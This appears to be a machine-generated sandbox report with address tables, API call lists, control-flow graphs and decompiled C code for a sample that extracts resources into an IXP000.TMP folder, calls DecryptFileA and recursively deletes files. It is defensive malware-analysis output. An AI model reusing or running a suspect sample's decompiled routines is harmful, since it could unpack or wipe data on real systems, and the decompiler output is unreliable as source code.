                                                                                                                                                                                                                                      0x004030a0
                                                                                                                                                                                                                                      0x0040309e
                                                                                                                                                                                                                                      0x004030a7
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040307c
                                                                                                                                                                                                                                      0x0040307c
                                                                                                                                                                                                                                      0x00403082
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403084
                                                                                                                                                                                                                                      0x00403089
                                                                                                                                                                                                                                      0x0040308b
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040308d
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040308d
                                                                                                                                                                                                                                      0x0040307a
                                                                                                                                                                                                                                      0x0040304d
                                                                                                                                                                                                                                      0x00403052
                                                                                                                                                                                                                                      0x00403054
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403054
                                                                                                                                                                                                                                      0x0040301e
                                                                                                                                                                                                                                      0x00403025
                                                                                                                                                                                                                                      0x0040302f
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040302f
                                                                                                                                                                                                                                      0x00402ff9
                                                                                                                                                                                                                                      0x00402fff
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403001
                                                                                                                                                                                                                                      0x00403008
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403008
                                                                                                                                                                                                                                      0x00402f73
                                                                                                                                                                                                                                      0x00402f32
                                                                                                                                                                                                                                      0x00402f39
                                                                                                                                                                                                                                      0x00402f52
                                                                                                                                                                                                                                      0x00402f52
                                                                                                                                                                                                                                      0x00402f57
                                                                                                                                                                                                                                      0x00402f59
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00402f59
                                                                                                                                                                                                                                      0x00402f42
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00402f48
                                                                                                                                                                                                                                      0x00402f50
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000105), ref: 00402F86
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00402FA5
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00402FB9
                                                                                                                                                                                                                                      • DecryptFileA.ADVAPI32 ref: 00402FD9
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00402FEB
                                                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0040300F
                                                                                                                                                                                                                                        • Part of subcall function 004051A5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00402F40,?,00000002,00000000), ref: 004051C1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                      • API String ID: 2126469477-3632011670
                                                                                                                                                                                                                                      • Opcode ID: 91c863ebd388d4019782095921e111351da68b050c26de51240790059939d188
                                                                                                                                                                                                                                      • Instruction ID: 421eec8871e07a98a0fdcd4d30a29a553b1230306fd831c86904257e7eae0c43
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 91c863ebd388d4019782095921e111351da68b050c26de51240790059939d188
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A41D530B022469BDB20AF369F4965B3BAC9B54395F00007FA941F66D5EB7C8D41CA2D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 570 404669-40468e FindResourceA SizeofResource 571 404690-404692 570->571 572 4046d5-4046d9 570->572 571->572 573 404694-404696 571->573 574 4046d3 573->574 575 404698-4046b7 FindResourceA LoadResource LockResource 573->575 574->572 575->574 576 4046b9-4046d1 memcpy_s FreeResource 575->576 576->572
                                                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                                                      			E00404669(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                      				struct HRSRC__* _t3;
                                                                                                                                                                                                                                      				long _t4;
                                                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                                                      				CHAR* _t14;
                                                                                                                                                                                                                                      				void* _t15;
                                                                                                                                                                                                                                      				long _t16;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t14 = __ecx;
                                                                                                                                                                                                                                      				_t11 = __edx;
                                                                                                                                                                                                                                      				_t3 = FindResourceA(0, __ecx, 0xa); // executed
                                                                                                                                                                                                                                      				_t4 = SizeofResource(0, _t3);
                                                                                                                                                                                                                                      				_t16 = _t4;
                                                                                                                                                                                                                                      				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                                                      					if(_t16 == 0) {
                                                                                                                                                                                                                                      						L5:
                                                                                                                                                                                                                                      						return 0;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                                                                                                      						goto L5;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                                                      					FreeResource(_t15);
                                                                                                                                                                                                                                      					return _t16;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				return _t4;
                                                                                                                                                                                                                                      			}









                                                                                                                                                                                                                                      0x00404673
                                                                                                                                                                                                                                      0x00404675
                                                                                                                                                                                                                                      0x0040467a
                                                                                                                                                                                                                                      0x00404683
                                                                                                                                                                                                                                      0x00404689
                                                                                                                                                                                                                                      0x0040468e
                                                                                                                                                                                                                                      0x00404696
                                                                                                                                                                                                                                      0x004046d3
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004046d3
                                                                                                                                                                                                                                      0x004046b3
                                                                                                                                                                                                                                      0x004046b7
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004046bf
                                                                                                                                                                                                                                      0x004046c9
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004046cf
                                                                                                                                                                                                                                      0x004046d9

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 0040467A
                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000,?,00402D11,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00404683
                                                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 0040469D
                                                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000,?,00402D11,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A6
                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000,?,00402D11,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046AD
                                                                                                                                                                                                                                      • memcpy_s.MSVCRT ref: 004046BF
                                                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046C9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                      • String ID: OxZQ$TITLE
                                                                                                                                                                                                                                      • API String ID: 3370778649-7950973
                                                                                                                                                                                                                                      • Opcode ID: 735a035723e9c89e979ff7554535d7cc5c2412197345818d6819b7f6aae81ff3
                                                                                                                                                                                                                                      • Instruction ID: d4f114c631e8c0bc48fd7fdb16bc5f096ff33333a584b02022fb528400c69871
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 735a035723e9c89e979ff7554535d7cc5c2412197345818d6819b7f6aae81ff3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC01F9726443047BE3101BA5AD0CF6B3E2DDBC6B62F044435FF06B6280D9768870827E
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 577 405423-405440 578 405446-40544c call 40535f 577->578 579 4054d8-4054e4 call 4016a0 577->579 582 405451-405453 578->582 583 4054e9-4054f5 call 405880 579->583 584 405459-40547c call 4017a1 582->584 585 40553d-40553f 582->585 592 4054f7-405501 CreateDirectoryA 583->592 593 405509-40550e 583->593 594 4054c8-4054d6 call 406534 584->594 595 40547e-405494 GetSystemInfo 584->595 588 405549-405557 call 406c80 585->588 597 405533-405538 call 406233 592->597 598 405503 592->598 599 405510-405513 call 405933 593->599 600 405541-405547 593->600 594->583 604 405496-405499 595->604 605 4054ba 595->605 597->585 598->593 606 405518-40551a 599->606 600->588 610 4054b3-4054b8 604->610 611 40549b-40549e 604->611 607 4054bf-4054c3 call 406534 605->607 606->600 612 40551c-405522 606->612 607->594 610->607 614 4054a0-4054a3 611->614 615 4054ac-4054b1 611->615 612->585 616 405524-405531 RemoveDirectoryA 612->616 614->594 617 4054a5-4054aa 614->617 615->607 616->585 617->607
                                                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                                                      			E00405423(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                                                      				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                      				signed int _t10;
                                                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                                                      				intOrPtr _t14;
                                                                                                                                                                                                                                      				void* _t16;
                                                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                                                      				signed int _t26;
                                                                                                                                                                                                                                      				void* _t28;
                                                                                                                                                                                                                                      				void* _t29;
                                                                                                                                                                                                                                      				CHAR* _t48;
                                                                                                                                                                                                                                      				signed int _t49;
                                                                                                                                                                                                                                      				intOrPtr _t61;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t10 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                                                      				if(__edx == 0) {
                                                                                                                                                                                                                                      					_t48 = 0x4091e4;
                                                                                                                                                                                                                                      					_t42 = 0x104;
                                                                                                                                                                                                                                      					E004016A0(0x4091e4, 0x104);
                                                                                                                                                                                                                                      					L14:
                                                                                                                                                                                                                                      					_t13 = E00405880(_t48); // executed
                                                                                                                                                                                                                                      					if(_t13 != 0) {
                                                                                                                                                                                                                                      						L17:
                                                                                                                                                                                                                                      						_t42 = _a4;
                                                                                                                                                                                                                                      						if(_a4 == 0) {
                                                                                                                                                                                                                                      							L23:
                                                                                                                                                                                                                                      							 *0x409124 = 0;
                                                                                                                                                                                                                                      							_t14 = 1;
                                                                                                                                                                                                                                      							L24:
                                                                                                                                                                                                                                      							return E00406C80(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t16 = E00405933(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                                                      						if(_t16 != 0) {
                                                                                                                                                                                                                                      							goto L23;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t61 =  *0x408a20; // 0x0
                                                                                                                                                                                                                                      						if(_t61 != 0) {
                                                                                                                                                                                                                                      							 *0x408a20 = 0;
                                                                                                                                                                                                                                      							RemoveDirectoryA(_t48);
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						L22:
                                                                                                                                                                                                                                      						_t14 = 0;
                                                                                                                                                                                                                                      						goto L24;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                                                      						 *0x409124 = E00406233();
                                                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					 *0x408a20 = 1;
                                                                                                                                                                                                                                      					goto L17;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t42 =  &_v268;
                                                                                                                                                                                                                                      				_t20 = E0040535F(__ecx,  &_v268); // executed
                                                                                                                                                                                                                                      				if(_t20 == 0) {
                                                                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                                                      				_t48 = 0x4091e4;
                                                                                                                                                                                                                                      				E004017A1(0x4091e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                                                      				if(( *0x409a34 & 0x00000020) == 0) {
                                                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                                                      					_t42 = 0x104;
                                                                                                                                                                                                                                      					E00406534(_t48, 0x104, 0x401140);
                                                                                                                                                                                                                                      					goto L14;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				GetSystemInfo( &_v304);
                                                                                                                                                                                                                                      				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                                                      				if(_t26 == 0) {
                                                                                                                                                                                                                                      					_push("i386");
                                                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                                                      					E00406534(_t48, 0x104);
                                                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t28 = _t26 - 1;
                                                                                                                                                                                                                                      				if(_t28 == 0) {
                                                                                                                                                                                                                                      					_push("mips");
                                                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t29 = _t28 - 1;
                                                                                                                                                                                                                                      				if(_t29 == 0) {
                                                                                                                                                                                                                                      					_push("alpha");
                                                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				if(_t29 != 1) {
                                                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_push("ppc");
                                                                                                                                                                                                                                      				goto L11;
                                                                                                                                                                                                                                      			}




















                                                                                                                                                                                                                                      0x0040542e
                                                                                                                                                                                                                                      0x00405435
                                                                                                                                                                                                                                      0x0040543d
                                                                                                                                                                                                                                      0x00405440
                                                                                                                                                                                                                                      0x004054d8
                                                                                                                                                                                                                                      0x004054dd
                                                                                                                                                                                                                                      0x004054e4
                                                                                                                                                                                                                                      0x004054e9
                                                                                                                                                                                                                                      0x004054eb
                                                                                                                                                                                                                                      0x004054f5
                                                                                                                                                                                                                                      0x00405509
                                                                                                                                                                                                                                      0x00405509
                                                                                                                                                                                                                                      0x0040550e
                                                                                                                                                                                                                                      0x00405541
                                                                                                                                                                                                                                      0x00405541
                                                                                                                                                                                                                                      0x00405547
                                                                                                                                                                                                                                      0x00405549
                                                                                                                                                                                                                                      0x00405557
                                                                                                                                                                                                                                      0x00405557
                                                                                                                                                                                                                                      0x00405513
                                                                                                                                                                                                                                      0x0040551a
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040551c
                                                                                                                                                                                                                                      0x00405522
                                                                                                                                                                                                                                      0x00405525
                                                                                                                                                                                                                                      0x0040552b
                                                                                                                                                                                                                                      0x0040552b
                                                                                                                                                                                                                                      0x0040553d
                                                                                                                                                                                                                                      0x0040553d
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040553d
                                                                                                                                                                                                                                      0x00405501
                                                                                                                                                                                                                                      0x00405538
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405538
                                                                                                                                                                                                                                      0x00405503
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405503
                                                                                                                                                                                                                                      0x00405446
                                                                                                                                                                                                                                      0x0040544c
                                                                                                                                                                                                                                      0x00405453
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405459
                                                                                                                                                                                                                                      0x00405467
                                                                                                                                                                                                                                      0x00405470
                                                                                                                                                                                                                                      0x0040547c
                                                                                                                                                                                                                                      0x004054c8
                                                                                                                                                                                                                                      0x004054cd
                                                                                                                                                                                                                                      0x004054d1
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004054d1
                                                                                                                                                                                                                                      0x00405485
                                                                                                                                                                                                                                      0x00405492
                                                                                                                                                                                                                                      0x00405494
                                                                                                                                                                                                                                      0x004054ba
                                                                                                                                                                                                                                      0x004054bf
                                                                                                                                                                                                                                      0x004054c3
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004054c3
                                                                                                                                                                                                                                      0x00405496
                                                                                                                                                                                                                                      0x00405499
                                                                                                                                                                                                                                      0x004054b3
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004054b3
                                                                                                                                                                                                                                      0x0040549b
                                                                                                                                                                                                                                      0x0040549e
                                                                                                                                                                                                                                      0x004054ac
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004054ac
                                                                                                                                                                                                                                      0x004054a3
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004054a5
                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405485
                                                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004054F9
                                                                                                                                                                                                                                      • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040552B
                                                                                                                                                                                                                                        • Part of subcall function 0040535F: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004053B9
                                                                                                                                                                                                                                        • Part of subcall function 0040535F: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004053C0
                                                                                                                                                                                                                                        • Part of subcall function 0040535F: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004053DD
                                                                                                                                                                                                                                        • Part of subcall function 0040535F: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004053E9
                                                                                                                                                                                                                                        • Part of subcall function 0040535F: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004053F2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                      • API String ID: 1979080616-4226573791
                                                                                                                                                                                                                                      • Opcode ID: 75e63ed2cd2663772c59348967b2b4fb2ea8feadf988a5ca78842532f377727d
                                                                                                                                                                                                                                      • Instruction ID: 319f0f4dbe6b1e76bf950e40687b0d9189eaa333d0d0c83a1ef7543f7cbf5b92
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75e63ed2cd2663772c59348967b2b4fb2ea8feadf988a5ca78842532f377727d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95315E70700B1067D714AF2A9E45ABF76AADB80344B54403FB806B22D5CB7CCD428D5D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                                                      			E00402395(CHAR* __ecx) {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                                                      				char _v280;
                                                                                                                                                                                                                                      				char _v284;
                                                                                                                                                                                                                                      				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                                                      				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                                                                      				int _t36;
                                                                                                                                                                                                                                      				void* _t46;
                                                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                                                      				void* _t63;
                                                                                                                                                                                                                                      				CHAR* _t65;
                                                                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                                                                      				signed int _t67;
                                                                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                                                      				_t21 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                                                      				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                                                      				_t65 = __ecx;
                                                                                                                                                                                                                                      				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                                                      					_pop(_t62);
                                                                                                                                                                                                                                      					_pop(_t66);
                                                                                                                                                                                                                                      					_pop(_t46);
                                                                                                                                                                                                                                      					return E00406C80(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					E004016A0( &_v276, 0x104, __ecx);
                                                                                                                                                                                                                                      					_t58 = 0x104;
                                                                                                                                                                                                                                      					E004016D3( &_v280, 0x104, "*");
                                                                                                                                                                                                                                      					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                                                      					_t63 = _t22;
                                                                                                                                                                                                                                      					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                      						goto L3;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					do {
                                                                                                                                                                                                                                      						L3:
                                                                                                                                                                                                                                      						_t58 = 0x104;
                                                                                                                                                                                                                                      						E004016A0( &_v276, 0x104, _t65);
                                                                                                                                                                                                                                      						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                                                      							_t58 = 0x104;
                                                                                                                                                                                                                                      							E004016D3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                                                      							SetFileAttributesA( &_v280, 0x80); // executed
                                                                                                                                                                                                                                      							DeleteFileA( &_v280); // executed
                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                      							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                                                      								E004016D3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                                                      								_t58 = 0x104;
                                                                                                                                                                                                                                      								E00406534( &_v280, 0x104, 0x401140);
                                                                                                                                                                                                                                      								E00402395( &_v284);
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                                                      					} while (_t36 != 0);
                                                                                                                                                                                                                                      					FindClose(_t63);
                                                                                                                                                                                                                                      					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      			}





















                                                                                                                                                                                                                                      0x0040239d
                                                                                                                                                                                                                                      0x004023a3
                                                                                                                                                                                                                                      0x004023a8
                                                                                                                                                                                                                                      0x004023aa
                                                                                                                                                                                                                                      0x004023b3
                                                                                                                                                                                                                                      0x004023b8
                                                                                                                                                                                                                                      0x004024d0
                                                                                                                                                                                                                                      0x004024d7
                                                                                                                                                                                                                                      0x004024d8
                                                                                                                                                                                                                                      0x004024d9
                                                                                                                                                                                                                                      0x004024e4
                                                                                                                                                                                                                                      0x004023c7
                                                                                                                                                                                                                                      0x004023d6
                                                                                                                                                                                                                                      0x004023e0
                                                                                                                                                                                                                                      0x004023e9
                                                                                                                                                                                                                                      0x004023fb
                                                                                                                                                                                                                                      0x00402401
                                                                                                                                                                                                                                      0x00402406
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040240c
                                                                                                                                                                                                                                      0x0040240c
                                                                                                                                                                                                                                      0x0040240d
                                                                                                                                                                                                                                      0x00402416
                                                                                                                                                                                                                                      0x00402424
                                                                                                                                                                                                                                      0x0040247f
                                                                                                                                                                                                                                      0x00402488
                                                                                                                                                                                                                                      0x0040249a
                                                                                                                                                                                                                                      0x004024a8
                                                                                                                                                                                                                                      0x00402426
                                                                                                                                                                                                                                      0x00402434
                                                                                                                                                                                                                                      0x00402458
                                                                                                                                                                                                                                      0x00402462
                                                                                                                                                                                                                                      0x0040246b
                                                                                                                                                                                                                                      0x00402477
                                                                                                                                                                                                                                      0x00402477
                                                                                                                                                                                                                                      0x00402434
